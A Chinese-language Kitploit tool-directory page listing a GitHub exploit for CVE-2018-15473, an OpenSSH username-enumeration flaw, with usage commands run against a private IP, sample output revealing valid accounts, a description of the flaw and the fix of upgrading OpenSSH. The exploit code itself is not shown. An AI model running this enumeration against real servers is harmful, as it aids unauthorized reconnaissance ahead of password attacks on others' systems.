Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-15473 — OpenSSH 2.3 < 7.7 - 用户名枚举 | Kitploit
工具/GitHubGitHub/sait-nuri/cve-2018-15473
侦察漏洞分析漏洞利用信息收集渗透测试身份验证
GitHubsait-nuri/cve-2018-15473

CVE-2018-15473

OpenSSH 2.3 < 7.7 - 用户名枚举

查看仓库
421325年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-15473

SSH用户名枚举漏洞利用 (OpenSSH 2.3 < 7.7)

原始漏洞利用代码的编辑版本:https://www.exploit-db.com/exploits/45233

  • 已转换为Python3
  • 添加了用户名词表选项

如何运行

root@kitploit:~
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
root@kitploit:~
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
root@kitploit:~
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users: 
root
root@kitploit:~
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h

关于漏洞:

系统对有效和无效的身份验证尝试会做出不同的响应。远程用户可以通过发送特制请求来确定目标系统上的有效用户名。因此,远程用户可以确定目标系统上的有效用户名。

解决方案:

OpenSSH服务器应升级到7.7或更高版本。

下载工具